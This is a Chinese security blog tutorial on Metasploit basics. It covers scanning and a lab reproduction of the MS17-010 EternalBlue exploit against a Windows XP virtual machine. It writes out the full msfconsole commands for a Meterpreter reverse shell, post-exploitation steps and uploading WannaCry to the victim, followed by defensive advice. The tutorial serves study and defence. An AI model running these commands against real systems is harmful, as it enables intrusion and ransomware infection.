[系统安全] 四十四.APT系列(9)Metasploit技术之基础用法万字详解及防御机理
您可能之前看到過我寫的類似文章,為什么還要重復(fù)撰寫呢?只是想更好地幫助初學(xué)者了解病毒逆向分析和系統(tǒng)安全,更加成體系且不破壞之前的系列。因此,我重新開設(shè)了這個專欄,準(zhǔn)備系統(tǒng)整理和深入學(xué)習(xí)系統(tǒng)安全、逆向分析和惡意代碼檢測,“系統(tǒng)安全”系列文章會更加聚焦,更加系統(tǒng),更加深入,也是作者的慢慢成長史。換專業(yè)確實(shí)挺難的,逆向分析也是塊硬骨頭,但我也試試,看看自己未來四年究竟能將它學(xué)到什么程度,漫漫長征路,偏向虎山行。享受過程,一起加油~
前文講解了APT攻擊中常用的攻擊手段,即PowerShell和PowerSploit腳本攻擊,并進(jìn)一步結(jié)合MSF漏洞利用來實(shí)現(xiàn)腳本攻擊。這篇文章將帶領(lǐng)大家了解Metasploit技術(shù),它和CS都是APT攻擊中常見的方式,并結(jié)合作者之前的漏洞利用及WannaCry逆向經(jīng)驗(yàn)總結(jié)。希望這篇文章對您有幫助,本文參考徐焱老師的《Web安全攻防滲透測試實(shí)戰(zhàn)指南》著作,謝公子博客,并結(jié)合作者之前的博客和經(jīng)驗(yàn)進(jìn)行總結(jié)。希望這篇文章對您有所幫助,這些大佬是真的值得我們?nèi)W(xué)習(xí),獻(xiàn)上小弟的膝蓋~fighting!
文章目錄
- 一.Metasploit簡介
- 二.Metasploit基礎(chǔ)普及
- 1.專業(yè)術(shù)語
- 2.滲透步驟及攻擊鏈
- 三.主機(jī)掃描
- 1.使用輔助模塊進(jìn)行端口掃描
- 2.使用輔助模塊進(jìn)行服務(wù)掃描
- 3.使用Nmap掃描
- 四.漏洞利用之MS17-010案例
- 1.背景知識
- 2.漏洞利用復(fù)現(xiàn)
- 3.防御措施
- 五.總結(jié)
希望這些基礎(chǔ)原理能更好地幫助大家做好防御和保護(hù),基礎(chǔ)性文章,希望對您有所幫助。作者作為網(wǎng)絡(luò)安全的小白,分享一些自學(xué)基礎(chǔ)教程給大家,主要是在線筆記,希望您們喜歡。同時,更希望您能與我一起操作和進(jìn)步,后續(xù)將深入學(xué)習(xí)網(wǎng)絡(luò)安全和系統(tǒng)安全知識并分享相關(guān)實(shí)驗(yàn)??傊?#xff0c;希望該系列文章對博友有所幫助,寫文不易,大神們不喜勿噴,謝謝!如果文章對您有幫助,將是我創(chuàng)作的最大動力,點(diǎn)贊、評論、私聊均可,一起加油喔!
作者的github資源:
- 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
- 網(wǎng)絡(luò)安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study
從2019年7月開始,我來到了一個陌生的專業(yè)——網(wǎng)絡(luò)空間安全。初入安全領(lǐng)域,是非常痛苦和難受的,要學(xué)的東西太多、涉及面太廣,但好在自己通過分享100篇“網(wǎng)絡(luò)安全自學(xué)”系列文章,艱難前行著。感恩這一年相識、相知、相趣的安全大佬和朋友們,如果寫得不好或不足之處,還請大家海涵!
接下來我將開啟新的安全系列,叫“系統(tǒng)安全”,也是免費(fèi)的100篇文章,作者將更加深入的去研究惡意樣本分析、逆向分析、內(nèi)網(wǎng)滲透、網(wǎng)絡(luò)攻防實(shí)戰(zhàn)等,也將通過在線筆記和實(shí)踐操作的形式分享與博友們學(xué)習(xí),希望能與您一起進(jìn)步,加油~
- 推薦前文:網(wǎng)絡(luò)安全自學(xué)篇系列-100篇
前文分析:
- [系統(tǒng)安全] 一.什么是逆向分析、逆向分析基礎(chǔ)及經(jīng)典掃雷游戲逆向
- [系統(tǒng)安全] 二.如何學(xué)好逆向分析及呂布傳游戲逆向案例
- [系統(tǒng)安全] 三.IDA Pro反匯編工具初識及逆向工程解密實(shí)戰(zhàn)
- [系統(tǒng)安全] 四.OllyDbg動態(tài)分析工具基礎(chǔ)用法及Crakeme逆向
- [系統(tǒng)安全] 五.OllyDbg和Cheat Engine工具逆向分析植物大戰(zhàn)僵尸游戲
- [系統(tǒng)安全] 六.逆向分析之條件語句和循環(huán)語句源碼還原及流程控制
- [系統(tǒng)安全] 七.逆向分析之PE病毒原理、C++實(shí)現(xiàn)文件加解密及OllyDbg逆向
- [系統(tǒng)安全] 八.Windows漏洞利用之CVE-2019-0708復(fù)現(xiàn)及藍(lán)屏攻擊
- [系統(tǒng)安全] 九.Windows漏洞利用之MS08-067遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)及深度提權(quán)
- [系統(tǒng)安全] 十.Windows漏洞利用之SMBv3服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2020-0796)復(fù)現(xiàn)
- [系統(tǒng)安全] 十一.那些年的熊貓燒香及PE病毒行為機(jī)理分析
- [系統(tǒng)安全] 十二.熊貓燒香病毒IDA和OD逆向分析(上)病毒初始化
- [系統(tǒng)安全] 十三.熊貓燒香病毒IDA和OD逆向分析(中)病毒釋放機(jī)理
- [系統(tǒng)安全] 十四.熊貓燒香病毒IDA和OD逆向分析–病毒釋放過程(下)
- [系統(tǒng)安全] 十五.Chrome瀏覽器保留密碼功能滲透解析、藍(lán)屏漏洞及某音樂軟件漏洞復(fù)現(xiàn)
- [系統(tǒng)安全] 十六.PE文件逆向基礎(chǔ)知識(PE解析、PE編輯工具和PE修改)
- [系統(tǒng)安全] 十七.Windows PE病毒概念、分類及感染方式詳解
- [系統(tǒng)安全] 十八.病毒攻防機(jī)理及WinRAR惡意劫持漏洞(腳本病毒、自啟動、定時關(guān)機(jī)、藍(lán)屏攻擊)
- [系統(tǒng)安全] 十九.宏病毒之入門基礎(chǔ)、防御措施、自發(fā)郵件及APT28宏樣本分析
- [系統(tǒng)安全] 二十.PE數(shù)字簽名之(上)什么是數(shù)字簽名及Signtool簽名工具詳解
- [系統(tǒng)安全] 二十一.PE數(shù)字簽名之(中)Signcode、PEView、010Editor、Asn1View工具用法
- [系統(tǒng)安全] 二十二.PE數(shù)字簽名之(下)微軟證書漏洞CVE-2020-0601復(fù)現(xiàn)及Windows驗(yàn)證機(jī)制分析
- [系統(tǒng)安全] 二十三.逆向分析之OllyDbg動態(tài)調(diào)試復(fù)習(xí)及TraceMe案例分析
- [系統(tǒng)安全] 二十四.逆向分析之OllyDbg調(diào)試INT3斷點(diǎn)、反調(diào)試、硬件斷點(diǎn)與內(nèi)存斷點(diǎn)
- [系統(tǒng)安全] 二十五.WannaCry勒索病毒分析 (1)Python復(fù)現(xiàn)永恒之藍(lán)漏洞實(shí)現(xiàn)勒索加密
- [系統(tǒng)安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及病毒解析
- [系統(tǒng)安全] 二十七.WannaCry勒索病毒分析 (3)蠕蟲傳播機(jī)制解析及IDA和OD逆向
- [系統(tǒng)安全] 二十八.WannaCry勒索病毒分析 (4)全網(wǎng)"最"詳細(xì)的蠕蟲傳播機(jī)制解讀
- [系統(tǒng)安全] 二十九.深信服分享之外部威脅防護(hù)和勒索病毒對抗
- [系統(tǒng)安全] 三十.CS逆向分析 (1)你的游戲子彈用完了嗎?Cheat Engine工具入門普及
- [系統(tǒng)安全] 三十一.惡意代碼檢測(1)惡意代碼攻擊溯源及惡意樣本分析
- [系統(tǒng)安全] 三十二.惡意代碼檢測(2)常用技術(shù)詳解及總結(jié)
- [系統(tǒng)安全] 三十三.惡意代碼檢測(3)基于機(jī)器學(xué)習(xí)的惡意代碼檢測技術(shù)
- [系統(tǒng)安全] 三十四.惡意代碼檢測(4)編寫代碼自動提取IAT表、字符串及時間戳溯源地區(qū)
- [系統(tǒng)安全] 三十五.Procmon工具基本用法及文件進(jìn)程、注冊表查看
- [系統(tǒng)安全] 三十六.APT系列(1)APT攻擊溯源防御與常見APT組織的攻擊案例
- [系統(tǒng)安全] 三十七.APT系列(2)遠(yuǎn)控木馬詳解與防御及APT攻擊中的遠(yuǎn)控
- [系統(tǒng)安全] 三十八.APT系列(3)惡意代碼與APT攻擊中的武器(強(qiáng)推Seak老師)
- [系統(tǒng)安全] 三十九.APT系列(4)APT攻防溯源普及和醫(yī)療數(shù)據(jù)安全防御總結(jié)
- [系統(tǒng)安全] 四十.APT系列(5)APT組織常用WinRAR漏洞復(fù)現(xiàn)(CVE-2018-20250)及惡意軟件劫持
- [系統(tǒng)安全] 四十一.APT系列(6)Python解析PE文件并獲取時間戳判斷來源區(qū)域
- [系統(tǒng)安全] 四十二.APT系列(7)基于溯源圖的APT攻擊檢測安全頂會論文總結(jié)
- [系統(tǒng)安全] 四十三.APT系列(8)Powershell和PowerSploit腳本滲透攻擊手段詳解
- [系統(tǒng)安全] 四十四.APT系列(9)Metasploit技術(shù)之基礎(chǔ)用法萬字詳解及防御機(jī)理
聲明:本人堅決反對利用教學(xué)方法進(jìn)行犯罪的行為,一切犯罪行為必將受到嚴(yán)懲,綠色網(wǎng)絡(luò)需要我們共同維護(hù),更推薦大家了解它們背后的原理,更好地進(jìn)行防護(hù)。
一.Metasploit簡介
Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業(yè)人士識別安全性問題,驗(yàn)證漏洞的緩解措施,并管理專家驅(qū)動的安全性進(jìn)行評估,提供真正的安全風(fēng)險情報。這些功能包括智能開發(fā)、代碼審計、Web應(yīng)用程序掃描、社會工程等。
Metasploit框架(Metasploit Framework,MSF)是一個開源工具,旨在方便滲透測試,它是由Ruby程序語言編寫的模板化框架,具有很好的擴(kuò)展性,便于滲透測試人員開發(fā)、使用定制的工具模板。Metasploit已成為當(dāng)前信息安全與滲透測試領(lǐng)域最流行的術(shù)語。
Metasploit可向后端模塊提供多種用來控制測試的接口,如控制臺、Web、CLI。推薦使用控制臺接口,通過控制臺接口可以訪問和使用所有Metasploit的插件,如Payload、利用模塊、Post模塊等。Metasploit還有第三方程序的接口,比如Nmap、SQLMap等,可以直接在控制臺接口使用。
當(dāng)H.D. Moore在2003年發(fā)布Metasploit時,計算機(jī)安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來攻擊那些未打過補(bǔ)丁或者剛剛打過補(bǔ)丁的漏洞。軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補(bǔ)丁,這是因?yàn)镸etasploit團(tuán)隊(duì)一直都在努力開發(fā)各種攻擊工具,并將它們貢獻(xiàn)給所有Metasploit用戶。
- https://www.rapid7.com/products/metasploit/download/
這篇文章主要以Kali系統(tǒng)為基礎(chǔ),該操作系統(tǒng)預(yù)裝了Metasploit,訪問該界面,需要在命令行下輸入 msfconsole,MSF的啟動界面如下圖所示。
msfconsole在使用Kali操作系統(tǒng)時因注意及時更新資源,就像平時更新收集APP一樣。更新命令主要包括:
-
apt-get update
只更新軟件包的索引源,作用是同步源的軟件包的索引信息,從而進(jìn)行軟件更新 -
apt-get upgrade
升級系統(tǒng)上安裝的所有軟件包 -
apt-get dist-upgrade
升級整個Linux系統(tǒng)
二.Metasploit基礎(chǔ)普及
1.專業(yè)術(shù)語
MSF框架由多個模塊組成,各個模塊的功能如下,這也是Web滲透的基礎(chǔ)術(shù)語。
(1) Auxiliaries:輔助模塊
該模塊不會直接在測試者和目標(biāo)主機(jī)之間建立訪問,它們只負(fù)責(zé)執(zhí)行掃描、嗅探、指紋識別等相關(guān)功能以輔助滲透測試。
(2) Exploit:漏洞利用模塊
漏洞利用是指由滲透測試者利用一個系統(tǒng)、應(yīng)用或服務(wù)中的安全漏洞進(jìn)行的攻擊行為。流行的滲透攻擊技術(shù)包括:
- 緩沖區(qū)溢出
- Web應(yīng)用程序攻擊
- 利用配置錯誤
其中包含攻擊者或滲透人員針對系統(tǒng)中的漏洞而設(shè)計的各種POC驗(yàn)證程序,用于破壞系統(tǒng)安全性的攻擊代碼,每個漏洞都有相應(yīng)的攻擊代碼。
(3) Payload:攻擊載荷模塊
攻擊載荷是我們期望目標(biāo)系統(tǒng)在被滲透攻擊之后完成實(shí)際攻擊功能的代碼,成功滲透目標(biāo)后,用于在目標(biāo)系統(tǒng)上運(yùn)行任意命令或者執(zhí)行特定代碼,在Metasploit框架中可以自由地選擇、傳送和植入。攻擊載荷也可能是簡單地目標(biāo)操作系統(tǒng)上執(zhí)行一些命令,如添加用戶賬號等。
(4) Post:后期滲透模塊
該模塊主要用于取得目標(biāo)系統(tǒng)遠(yuǎn)程控制權(quán)后,進(jìn)行一系列的后滲透攻擊動作,如獲取敏感信息、實(shí)施跳板攻擊等。
(5) Encoders:編碼工具模塊
該模塊在滲透測試中負(fù)責(zé)免殺,以防止被殺毒軟件、防火墻、IDS及類似的安全軟件檢測出來。
2.滲透步驟及攻擊鏈
使用MSF滲透測試時,可以綜合使用以上模塊,對目標(biāo)系統(tǒng)進(jìn)行偵查并發(fā)動攻擊,大致的步驟如下所示:
- 掃描目標(biāo)主機(jī)系統(tǒng),尋找可用漏洞
- 選擇并配置一個漏洞利用模塊
- 選擇并配置一個攻擊載荷模塊
- 選擇一個編碼技術(shù),用來繞過殺毒軟件的查殺
- 滲透攻擊
注意,實(shí)戰(zhàn)才是最好的老師,希望大家了解MSF基礎(chǔ)用法后,在一些靶場或授權(quán)網(wǎng)站上進(jìn)行滲透測試。同時,為了方便大家理解滲透流程,作者回顧下之前介紹的攻擊鏈。攻擊鏈通常分為七個階段:
- 偵查目標(biāo)(Reconnaissance):偵查目標(biāo),充分利用社會工程學(xué)了解目標(biāo)網(wǎng)絡(luò)。
- 制作工具(Weaponization):主要是指制作定向攻擊工具,例如帶有惡意代碼的pdf文件或office文件。
- 傳送工具(Delivery):輸送攻擊工具到目標(biāo)系統(tǒng)上,常用的手法包括郵件的附件、網(wǎng)站(掛馬)、U盤等。
- 觸發(fā)工具(Exploitation):利用目標(biāo)系統(tǒng)的應(yīng)用或操作系統(tǒng)漏洞,在目標(biāo)系統(tǒng)觸發(fā)攻擊工具運(yùn)行。
- 安裝木馬(Installation):遠(yuǎn)程控制程序(特馬)的安裝,使得攻擊者可以長期潛伏在目標(biāo)系統(tǒng)中。
- 建立連接(Command and Control):與互聯(lián)網(wǎng)控制器服務(wù)器建立一個C2信道。
- 執(zhí)行攻擊(Actions on Objectives):執(zhí)行所需要得攻擊行為,例如偷取信息、篡改信息等。
三.主機(jī)掃描
掃描和收集信息是滲透測試的第一步,其主要目標(biāo)是盡可能多地發(fā)現(xiàn)有關(guān)目標(biāo)機(jī)器的信息。獲取的信息越多,滲透的概率越大。該步驟主要的關(guān)注點(diǎn)是:
- 目標(biāo)主機(jī)IP地址
- 可用服務(wù)
- 開放端口
1.使用輔助模塊進(jìn)行端口掃描
輔助模塊是Metasploit的內(nèi)置模塊。
第一步,利用search命令搜索有哪些可用端口模塊。
search portscan從下圖中可以看到可用的掃描器列表,其中包含了各種掃描類型。
第二步,以TCP掃描模塊為例。輸入use命令使用該漏洞利用模塊,然后show options查看需要設(shè)置的參數(shù)。
use auxiliary/scanner/portscan/tcp show options輸入命令時,按下tab鍵會自動補(bǔ)齊,輸出結(jié)果如下圖所示。在Required列中,被標(biāo)記為yes的參數(shù)必須包含實(shí)際的值,其中:
- RHOSTS - 設(shè)置待掃描的IP地址
- PORTS - 設(shè)置掃描端口范圍
- THREDAS - 設(shè)置掃描線程,線程數(shù)越高,掃描的速度越多
第三步,使用set命令設(shè)置相應(yīng)參數(shù),查看目標(biāo)主機(jī)開放端口。
當(dāng)然,也可以使用unset命令取消某個參數(shù)值的設(shè)置。這里的目標(biāo)主機(jī)是XP系統(tǒng),其IP地址為 192.168.44.135 。
具體命令如下,可以看到目標(biāo)主機(jī)開了 135、139、445 三個端口。
set RHOSTS 192.168.44.135 set PORTS 1-500 set THREADS 20 show options run輸出結(jié)果如下圖所示。還有兩個可選命令,setg和unsetg,二者用于在msfconsole中設(shè)置或取消設(shè)置全局性的參數(shù)值,從而避免重復(fù)輸入相同的值。
2.使用輔助模塊進(jìn)行服務(wù)掃描
在掃描目標(biāo)機(jī)器上運(yùn)行的服務(wù)時,有多種基于服務(wù)的掃描技術(shù)可供選擇,例如VNC、FTP、SMB等,只需執(zhí)行特定類型的掃描就可以發(fā)現(xiàn)服務(wù)。
通過 search 命令搜索 scanner 可以發(fā)現(xiàn)大量的掃描模塊,讀者可以嘗試不同的輔助掃描模塊,了解其功能。使用步驟和使用端口掃描模塊時基本相同,后續(xù)文章也會陸續(xù)介紹不同的用法。
常用的掃描模塊包括:
(1) 端口掃描
- auxiliary/scanner/portscan
端口掃描
(2) SMB掃描
- auxiliary/scanner/smb/smb_version
SMB系統(tǒng)版本掃描 - auxiliary/scanner/smb/smb_enumusers
SMB枚舉 - auxiliary/scanner/smb/smb_login
SMB弱口令掃描 - auxiliary/scanner/smb/psexec_command
SMB登錄執(zhí)行命令
(3) SSH掃描
- auxiliary/scanner/ssh/ssh_login
SSH登錄測試
(4) MSSQL掃描
- scanner/mssql/mssql_ping
MSSQL主機(jī)信息掃描 - admin/mssql/mssql_enum
MSSQL枚舉 - admin/mssql/mssql_exec
MSSQL執(zhí)行命令 - admin/mssql/mssql_sql
MSSQL查詢 - admin/mssql/mssql_login
MSSQL弱口令掃描
(5) MySQL掃描
- auxiliary/admin/mysql/mssql_enum
MySQL枚舉 - auxiliary/admin/mysql/mssql_sql
MySQL語句執(zhí)行 - auxiliary/scanner/mysql/mssql_login
MySQL弱口令掃描
(6) SMTP掃描
- auxiliary/scanner/smtp/smtp_version
SMTP版本掃描 - auxiliary/scanner/smtp/smtp_enum
SMTP枚舉
(7) 其他
- auxiliary/scanner/snmp/community
SNMP掃描設(shè)備 - auxiliary/scanner/telnet/telnet_login
Telnet登錄 - scanner/vnc/vnc_none_auth
VNC空口令掃描
3.使用Nmap掃描
在Metasploit中同樣可以使用Nmap掃描,Nmap不僅可以用來確定目標(biāo)網(wǎng)絡(luò)上計算機(jī)的存活狀態(tài),而且可以掃描計算機(jī)的操作系統(tǒng)、開放端口、服務(wù)等。熟練掌握Nmap的用法可以極大地提高個人的滲透測試技術(shù)。
實(shí)際上,在msf命令提示符下輸入nmap,就可以顯示Nmap提供的掃描選項(xiàng)列表,如下圖所示:
我們要獲取目標(biāo)主機(jī)的操作系統(tǒng),則輸入 nmap -O -Pn/-p0 URI 命令,其中Pn和-p0參數(shù)是不使用ping的方式,而假定所有主機(jī)系統(tǒng)都是活動的,可以穿透防火墻,也可以避免防火墻發(fā)現(xiàn)。運(yùn)行如下圖所示:
nmap -O -Pn 192.168.44.135輸出結(jié)果如下圖所示,可以看到目標(biāo)主機(jī)的操作系統(tǒng)如下,后續(xù)作者會詳細(xì)寫一篇文章介紹Nmap的用法。
- Windows 2000 | XP
四.漏洞利用之MS17-010案例
每個操作系統(tǒng)都會存在各種漏洞,像微公司會快速針對漏洞進(jìn)行打補(bǔ)丁,供用戶提供更新。而沒有公布補(bǔ)丁的Bug就是所謂的0day漏洞,其危害極大,也很受黑客和安全人員的喜愛。
實(shí)際上,像微軟這樣的公司都會針對自己的產(chǎn)品定期發(fā)布補(bǔ)丁,但是否下載取決于用戶自身。由于安全意識薄弱的個人或中小企業(yè)往往會忽略這些工作,打補(bǔ)丁可能會影響平時的工作,這種1day漏洞所造成的傷害也非常嚴(yán)重。
下面我們對Windows XP系統(tǒng)進(jìn)行MS17-010漏洞的復(fù)現(xiàn),前面我通過四篇文章逆向WannaCry時,詳細(xì)復(fù)現(xiàn)過該漏洞,希望大家喜歡。
- [網(wǎng)絡(luò)安全自學(xué)篇] 七十三.WannaCry勒索病毒復(fù)現(xiàn)及分析(四)蠕蟲傳播機(jī)制全網(wǎng)源碼詳細(xì)解讀
1.背景知識
2017年5月12日,WannaCry蠕蟲通過永恒之藍(lán)MS17-010漏洞在全球范圍大爆發(fā),感染大量的計算機(jī)。WannaCry勒索病毒全球大爆發(fā),至少150個國家、30萬名用戶中招,造成損失達(dá)80億美元,已影響金融、能源、醫(yī)療、教育等眾多行業(yè),造成嚴(yán)重的危害。
WannaCry是一種“蠕蟲式”勒索病毒軟件,由不法分子利用NSA泄露方程式工具包的危險漏洞“EternalBlue”(永恒之藍(lán))進(jìn)行傳播。該蠕蟲感染計算機(jī)后會向計算機(jī)中植入敲詐者病毒,導(dǎo)致電腦大量文件被加密。
WannaCry利用Windows系統(tǒng)的SMB漏洞獲取系統(tǒng)的最高權(quán)限,該工具通過惡意代碼掃描開放445端口的Windows系統(tǒng)。被掃描到的Windows系統(tǒng),只要開機(jī)上線,不需要用戶進(jìn)行任何操作,即可通過SMB漏洞上傳WannaCry勒索病毒等惡意程序。
WannaCry利用永恒之藍(lán)漏洞進(jìn)行網(wǎng)絡(luò)端口掃描攻擊,目標(biāo)機(jī)器被成功攻陷后會從攻擊機(jī)下載WannaCry蠕蟲進(jìn)行感染,并作為攻擊機(jī)再次掃描互聯(lián)網(wǎng)和局域網(wǎng)的其他機(jī)器,行成蠕蟲感染大范圍超快速擴(kuò)散。其核心流程如下圖所示:
WannaCry勒索病毒主要行為是傳播和勒索。
- 傳播:利用基于445端口的SMB漏洞MS17-010(永恒之藍(lán))進(jìn)行傳播
- 勒索:釋放文件,包括加密器、解密器、說明文件、語言文件等;加密文件;設(shè)置桌面背景、窗體信息及付款賬號等。
2.漏洞利用復(fù)現(xiàn)
實(shí)驗(yàn)環(huán)境:
- 攻擊機(jī):Kali-linux-2019.2 IP:192.168.44.138
- 受害主機(jī):WinXP 64位 IP:192.168.44.135
實(shí)驗(yàn)工具:
- metasploit
- MS17-010
- Wcry.exe
實(shí)驗(yàn)步驟:
- 配置Windows XP、Kali實(shí)驗(yàn)環(huán)境
- Kali檢測受害主機(jī)445端口(SMB協(xié)議)是否開啟
- 運(yùn)行EternalBlue永恒之藍(lán)漏洞(MS17-010)反彈shell
- 上傳勒索病毒wcry.exe并運(yùn)行實(shí)現(xiàn)勒索和文件加密(該文章不實(shí)現(xiàn))
切記、切記、切記:實(shí)驗(yàn)復(fù)現(xiàn)過程中必須在虛擬機(jī)中完成,運(yùn)行之前關(guān)閉虛擬機(jī)Win7文件共享,真機(jī)上一旦被感染你就真的只能想哭了(wannacry)。同時,該實(shí)驗(yàn)比上一篇文章精簡很多,更推薦該方法。
第一步,保證攻擊機(jī)和受害機(jī)相互通訊,均在同一個局域網(wǎng)中。
第二步,掃描靶機(jī)是否開啟445端口。
- nmap -sS 192.168.44.135
第三步,打開msfconsole并查詢MS17-010漏洞模塊。
這里有各種MS17-010漏洞版本,我們根據(jù)目標(biāo)系統(tǒng)選擇編號為3的版本。推薦讀者看看NSA泄露的方程式工具包,其中永恒之藍(lán)(eternalblue)就是著名的漏洞。
- msfconsole
- search ms17-010
第四步,利用永恒之藍(lán)漏洞并設(shè)置參數(shù)。
- use exploit/windows/smb/ms17_010_eternalblue
利用永恒之藍(lán)漏洞 - set payload windows/x64/meterpreter/reverse_tcp
設(shè)置payload - set LHOST 192.168.44.138
設(shè)置本機(jī)IP地址 - set RHOSTS 192.168.44.135
設(shè)置受害主機(jī)IP - set RPORT 445
設(shè)置端口445,注意該端口共享功能是高危漏洞端口,包括之前分享的139、3389等 - exploit
利用漏洞
通過 show options 可以查看我們設(shè)置的參數(shù)值。
注意,這里Win7和Win XP系統(tǒng)設(shè)置略有區(qū)別。如果用Win7的模塊去攻擊XP系統(tǒng),會造成計算機(jī)重啟,攻擊失敗,如下圖所示。
Windows XP設(shè)置的exp如下:
- exploit/windows/smb/ms17_010_eternalblue
運(yùn)行成功結(jié)果如下圖所示:
第五步,成功獲取Windows系統(tǒng)管理員權(quán)限。
- pwd、ls
查看當(dāng)前路徑及目錄 - getuid
返回系統(tǒng)管理員權(quán)限
第六步,在目標(biāo)主機(jī)上創(chuàng)建文件,嘗試控制目標(biāo)。
cd .. # 創(chuàng)建文件夾 mkdir hacker # 訪問目錄 dir cd hacker # 創(chuàng)建文件并寫入內(nèi)容 echo helloworld>test.txt # 查看目標(biāo)系統(tǒng)的基本信息 sysinfo第七步,上傳WannaCry。再次強(qiáng)調(diào),虛擬機(jī)中運(yùn)行該實(shí)驗(yàn),并且關(guān)閉文件共享功能,同時蠕蟲和漏洞利用分析是為了幫助大家了解原理進(jìn)行防御。
- shell
- upload /root/wcry.exe c:\
運(yùn)行病毒程序后的界面如下圖所示,已經(jīng)成功被勒索。再次強(qiáng)調(diào),所有代碼必須在虛擬機(jī)中執(zhí)行,并且關(guān)閉文件共享。
WannaCry蠕蟲加密系統(tǒng)中的文件,被加密的文件后綴名統(tǒng)一修改為“.WNCRY”。
- b.wnry: 中招敲詐者后桌面壁紙
- c.wnry: 配置文件,包含洋蔥域名、比特幣地址、tor下載地址等
- f.wnry: 可免支付解密的文件列表
- r.wnry: 提示文件,包含中招提示信息
- s.wnry: zip文件,包含Tor客戶端
- t.wnry: 測試文件
- u.wnry: 解密程序
3.防御措施
至此,我們已經(jīng)成功利用了MS17-010漏洞實(shí)現(xiàn)入侵,其防御常見的措施如下:
- 開啟系統(tǒng)防火墻
- 關(guān)閉445、139等端口連接
- 開啟系統(tǒng)自動更新,下載并更新補(bǔ)丁,及時修復(fù)漏洞
- 為計算機(jī)安全最新補(bǔ)丁,微軟已經(jīng)發(fā)布補(bǔ)丁MS17-010修復(fù)該漏洞,讀者也可以通過第三方工具下載補(bǔ)丁
- 安裝安全軟件,開啟主動防御進(jìn)行攔截查殺
- 如非服務(wù)需要,建議把高危漏洞的端口都關(guān)閉,比如 135、137、138、139、445、3389 等
- 開啟防火墻,及時備份重要文件
由于WannaCry等勒索病毒主要通過445端口入侵計算機(jī),關(guān)閉的方法如下:
- 控制面板–>windows防火墻—>高級選項(xiàng)–>入站規(guī)則
- 新建規(guī)則–>選擇端口–>指定端口號445
- 選擇阻止連接–>配置文件全選–>規(guī)則名稱–>成功關(guān)閉
實(shí)驗(yàn)在虛擬機(jī)中進(jìn)行,也需要關(guān)閉共享文件夾功能,如下圖所示。
五.總結(jié)
寫到這里,這篇文章就介紹完畢,希望您喜歡,本文主要是學(xué)習(xí)徐焱老師他們的《Web安全攻防滲透測試實(shí)戰(zhàn)指南》,同時結(jié)合作者之前的漏洞利用及WannaCry逆向經(jīng)驗(yàn)總結(jié)。
- 一.Metasploit簡介
- 二.Metasploit基礎(chǔ)普及
1.專業(yè)術(shù)語
2.滲透步驟及攻擊鏈 - 三.主機(jī)掃描
1.使用輔助模塊進(jìn)行端口掃描
2.使用輔助模塊進(jìn)行服務(wù)掃描
3.使用Nmap掃描 - 四.漏洞利用之MS17-010案例
1.背景知識
2.漏洞利用復(fù)現(xiàn)
3.防御措施
這篇文章中如果存在一些不足,還請海涵。作者作為網(wǎng)絡(luò)安全初學(xué)者的慢慢成長路吧!希望未來能更透徹撰寫相關(guān)文章。同時非常感謝參考文獻(xiàn)中的安全大佬們的文章分享,深知自己很菜,得努力前行。
歡迎大家討論,是否覺得這系列文章幫助到您!任何建議都可以評論告知讀者,共勉。
- 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
- 網(wǎng)絡(luò)安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study
學(xué)安全兩年,認(rèn)識了很多安全大佬和朋友,希望大家一起進(jìn)步。這篇文章中如果存在一些不足,還請海涵。作者作為網(wǎng)絡(luò)安全初學(xué)者的慢慢成長路吧!希望未來能更透徹撰寫相關(guān)文章。同時非常感謝參考文獻(xiàn)中的安全大佬們的文章分享,深知自己很菜,得努力前行。
(By:Eastmount 2022-01-13 夜于武漢 http://blog.csdn.net/eastmount/ )
參考文章如下,感謝這些大佬。
- [1] https://www.rapid7.com/products/metasploit/download/
- [2] 《Web安全攻防滲透測試實(shí)戰(zhàn)指南》徐焱、李文軒、王東亞老師
- [3] https://blog.csdn.net/Eastmount
總結(jié)
以上是生活随笔為你收集整理的[系统安全] 四十四.APT系列(9)Metasploit技术之基础用法万字详解及防御机理的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [系统安全] 四十一.APT系列(6)P
- 下一篇: [系统安全] 四十五.APT系列(10)